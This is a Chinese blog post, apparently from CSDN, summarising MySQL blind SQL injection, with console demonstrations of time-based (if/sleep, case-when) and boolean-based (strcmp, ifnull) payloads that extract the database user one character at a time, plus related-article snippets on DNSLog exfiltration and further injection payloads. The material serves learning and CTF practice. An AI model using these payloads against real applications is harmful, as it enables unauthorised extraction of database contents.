MySQL 盲注小总结

最新推荐文章于 2023-04-09 23:25:02 发布
最新推荐文章于 2023-04-09 23:25:02 发布
阅读量226 收藏
点赞数
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/wh11te/article/details/90375303
版权

0X00 盲注

  1. 时间盲注
  2. 布尔盲注

0x01简单的时间盲注

  • if()
    if (expre1,expre2,expre3) 当expre1为true时,返回expre2,反之,返回expre3.
    与之配合使用的常用分割函数有:

    substr
    substring
    left

mysql> select * from admin where id=1 and if((substr((select user()),1,1)='r'),sleep(5),1);
Empty set (5.01 sec)
mysql> select * from admin where id=1 and if((substr((select user()),1,1)='1r'),sleep(5),1);
+------+----------+----------+
| id   | username | password |
+------+----------+----------+
|    1 | admin    | admin    |
+------+----------+----------+
1 row in set (0.00 sec)
  • case when then else end
select * from admin where id=1 and case when (substr((select user()),1,1)='r') then sleep(3) else 1 end;
Empty set (3.02 sec)

mysql> select * from admin where id=1 and case when (substr((select user()),1,1)='1r') then sleep(3) else 1 end;
+------+----------+----------+
| id   | username | password |
+------+----------+----------+
|    1 | admin    | admin    |
+------+----------+----------+
1 row in set (0.00 sec)

0x02布尔盲注

布尔盲注主要思路有正则匹配,运算符,比较函数等
参考链接:https://www.anquanke.com/post/id/170626

  1. 使用比较函数strcmp()
mysql> select * from admin where id=1 and strcmp((substr((select user()),1,1)='r'),1);
Empty set (0.00 sec)

mysql> select * from admin where id=1 and strcmp((substr((select user()),1,1)='r'),0);
+------+----------+----------+
| id   | username | password |
+------+----------+----------+
|    1 | admin    | admin    |
+------+----------+----------+
1 row in set (0.00 sec)
  1. IFNULL() 函数
mysql> select * from admin where id=1 and ifnull((substr((select user()),1,1)='r'),0);
+------+----------+----------+
| id   | username | password |
+------+----------+----------+
|    1 | admin    | admin    |
+------+----------+----------+
1 row in set (0.00 sec)

mysql> select * from admin where id=1 and ifnull((substr((select user()),1,1)='1r'),0);
Empty set (0.00 sec)

0x03 子查询

在用到or的延时注入时可以用子查询缩短延时时间。当我们在做ctf
题时,使用子查询缩短时间来爆破就会凸显出它的优势。

mysql> select * from admin order by if((substr((select user()),1,1)='r'),(select 1 from(select sleep(2)) as b),password);
+------+-----------+----------+
| id   | username  | password |
+------+-----------+----------+
|    1 | admin     | admin    |
|    3 | admin'111 | 11       |
|    2 | cadmin    | fdfggh   |
+------+-----------+----------+
3 rows in set (2.00 sec)

mysql> select * from admin order by if((substr((select user()),1,1)='r'),sleep(2),password);
+------+-----------+----------+
| id   | username  | password |
+------+-----------+----------+
|    1 | admin     | admin    |
|    3 | admin'111 | 11       |
|    2 | cadmin    | fdfggh   |
+------+-----------+----------+
3 rows in set (6.05 sec)
wh11te
关注
DNSLog 盲注总结
m0_61506558的博客
10-26 526
总所周知,我们输入的域名需要通过DNS服务器进行解析得到IP地址才能通过IP访问网站,DNSLog就是存储在DNS服务器上的域名信息,它记录着用户对域名访问的信息,类似日志文件。我们只需要搭建一个的DNS服务器,并将要盲打或盲注的回显,放到自己域名的二级三级甚至更多级的子域名上去请求,就可以通过DNS解析日志来获取到它们。这样,所有访问 xie.com 的二级三级四级等等子域名都会被解析到我们的VPS上。我们就可以通过查询DNS解析记录来获得命令执行的回显了。(一)DNSLog部署过程。
mysql盲注总结
z7sz的博客
06-21 1148
本文的内容主要是对mysql盲注总结
mysql盲注_Mysql 另类盲注中的一些技巧小结
weixin_39765325的博客
01-18 85
一、order by 的参数注入技巧:两种方法,思路都一样。example. “select username,password from uc_members order by”.$_GET['oderby']a.常见的利用方法:1.[SQL] select username,password from uc_members order by 1,If((select 1)=2,1,(selec...
mysql盲注
最新发布
m0_65096687的博客
04-09 128
盲注仍然要判断字符类型注入,可以根据页面的反应。1 and 1=2 如果页面显示正常,那么就是字符型注入,因为如果是数字,不成立,会有异常。所以第一步仍是判断注入类型盲注就是存在注入但是页面上没有任何回显。盲注分为布尔盲注和时间盲注
mysql 盲注 if_Mysql 另类盲注中的一些技巧
weixin_29982199的博客
02-02 179
转:oldjun.com—————————————————————————-很多技巧从国外的paper学到的,不过国内没有多少人使用,所以发出来,笔记下~一、order by 的参数注入技巧:两种方法,思路都一样。example. “select username,password from uc_members order by”.$_GET['oderby']a.常见的利用方法:1.[SQL]...
mysql-blind(高级盲注+基于布尔).docx
01-23
总结来说,布尔型盲注是一种在无回显情况下探测和利用SQL注入的技巧,它依赖于页面输出状态的变化。尽管过程可能较为复杂,但通过熟练掌握和实践,可以有效地探测并利用这种类型的注入点。在实际安全审计中,掌握这...
使用Burpsuite进行半自动注入 布尔盲注和时间盲注 个人总结
代码审计
03-26 4191
利用前提 , 页面上没有显示位 , 也没有输出 $ QL 语句执行错误信息 。 正确的 SQL 语句和错误的 SQL 语句返回页面都 0 样 , . 但是加入 s 丨 p ( 5 ) 条件之 后 , 页面的返回速度明显慢了 5 秒 。 优点 . 不需要显示位 , 不需要出错信息 。 速度慢 , . 耗费大量时间 。 payload: and if(length(database())=8,sleep(10),1) --+ 判断当前数据库库名的长度 如果数据库库名长度大于等于8,则mysql查询休眠10
Mysql注入总结1
08-03
以下是对标题“Mysql注入总结1”和描述中涉及的知识点的详细解释: 1. **UNION SELECT 注入**: 当一个Web应用程序将用户输入的数据直接拼接到SQL查询中时,攻击者可以利用`UNION SELECT`来合并两个或多个查询结果...
MYSQL注入天书之盲注讲解
weixin_34413802的博客
08-11 185
Background-2 盲注的讲解 何为盲注盲注就是在sql注入过程中,sql语句执行的选择后,选择的数据不能回显到前端页面。此时,我们需要利用一些方法进行判断或者尝试,这个过程称之为盲注。从background-1中,我们可以知道盲注分为三类 •基于布尔SQL盲注 •基于时间的SQL盲注 •基于报错的SQL盲注 Ps:知识点太多了,这里只能简单列出来大致讲解一下。(ps:每...
MySQL盲注
xu_1234567的博客
09-25 452
1.MySQL盲注入原理 MySQL盲注入是在网址追加MySQL IF查询判断语句,通过网页输出来准确判断出ASCII码的值,拿到ASCII码后得到数据库名 2.MySQL函数 在进行MySQL盲注入,的使用以下MySQL函数 database() 查看数据库名 substr(str,1,4) 字符串截取 mid(str,1,4) 字符串截取 ascii码 if (条件,True,False) database() substr(str,1,4) if(条件,1,0) 3.注入测试 ...
mysql盲注代码
萧刚
10-09 760
盲注代码 ',(select/**/if((select/**/ord(substr(user(),1,1)))=114,sleep(3),0)),1)#
MySQL 盲注最全实例讲
kuxing100的专栏
04-19 1812
作者:YoCo Smart 来自:Silic Group Hacker Army 网址:http://blackbap.org 本文实例来自习科论坛交流三群。这个注入点可以使用错误回显注入来爆数据,本文出于 讲解的目的,使用更麻烦的盲注。 阅读本文,需要有一点点SQL 基础。盲注理解起来其实非常简单,就是做起来非常费劲 我们先来看注入点,是一个B2B 网站建站公司: http://w
mysql盲注_mysql盲注学习-1
weixin_32504329的博客
02-19 128
mysql:1.left() //left()函数left(a,b)从左侧截取a,的b位2.mid() //mid()函数参数描述column_name必需。要提取字符的字段。start必需。规定开始位置(起始值是 1)。length可选。要返回的字符数。如果省略,则 MID() 函数返回剩余文本。MID(DATABASE(),1,1)>’a’,查看数据库名第一位,MID(DATABASE(...
mysql盲注if半段_Mysql手工盲注小结
weixin_42636454的博客
02-03 329
布尔型盲注原理:在SQL注入过程中,应用程序仅仅返回True(页面)和False(页面)这时,我们无法根据应用程序的返回页面得到我们需要的数据库信息。但是可以通过构造逻辑判断(比较大小)来得到我们需要的信息MySQL盲注常用函数:length() #返回字符串的长度,例如可以返回数据库名字的长度substr() #用来截取字符串ascii() #返回字符的ascii码sleep(n) #将程序挂起...
MySQL盲注
qq_44656678的博客
09-14 279
关于MySQL盲注大概分为布尔型盲注,时间型盲注 主要会用到一下MySQL函数 在这里插入代码片 ord()转换为整形数值 mid("字符串",1,3)表示提取一个字符串中第一个字符,而且步长为3 limit(0,1)第一个参数指定第一个返回记录行的偏移量,第二个表示返回记录行的最大值 substr()表示把某个字符串提取出来 ascii()将变量变化为ascii转换数值 left() //取...
Mysql盲注总结
b1ackc4t的博客
01-24 2922
Mysql盲注 当我们无法从显示的页面上直接获取SQL语句的执行结果时,需要进行盲注 手工盲注的基本步骤 判断是否存在注入 字符型还是数值型 猜解当前数据库名 猜解数据库的表名 猜解表中的字段名 猜解数据 下面,我们探讨一下常见的三种盲注 基于报错的盲注 利用条件 系统未关闭数据库报错信息,对于一些sql错误直接回显在了错误上 未对报错函数进行过滤 group by key报错 原理 当在一个聚合函数,比如CONUNT函数后面如果使用分组语句就会把查询的一部分以错误的形式显示出来, co
【21】WEB安全学习----MySQL注入-6(时间及报错盲注)
尚未佩妥剑 转眼便江湖
09-20 529
目录   基于时间的盲注例子: 注入步骤: 确认注入点 猜解数据 报错注入例子: 注入方法 1.floor() 2.extractvalue() 3.updatexml() 基于时间的盲注例子: 修改代码,无论传入的参数值是否存在或者是SQL语句运行错误都统一输出hello mysql,因为返回的状态只有一种,无法通过布尔真假进行判断,此时可以用时间延迟进行判断,如果运行了...
mysql 盲注查询语句_SQL注入学习笔记——盲注
weixin_42498641的博客
02-18 2445
概念:如果每个应用程序都能按照我们输入的 SQL 命令返回我们需要的数据,那应用程序就无安全性可言了!为此,程序设计者们想到一个办法,那就是无论输入何种命令,只要 SQL 语句导致数据库产生错误,那么应用程序就会返回一个“通用的”的页面,或者重定向一个通用页面(可能为网站首页)。这时,回显方式的 SQL 注入办法就无法使用了。盲注,即在 SQL 注入过程中,SQL 语句执行选择后,选择的数据不能回...
MySQL布尔型高级盲注实战与技巧解析
MySQL盲注是一种高级的Web应用程序安全漏洞,特别是针对那些错误处理机制良好的目标页面。在这种情况下,常规的SQL注入利用方法,如通过UNION查询获取数据字段,可能因为页面无明显回显而变得困难。盲注分为几种类型...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值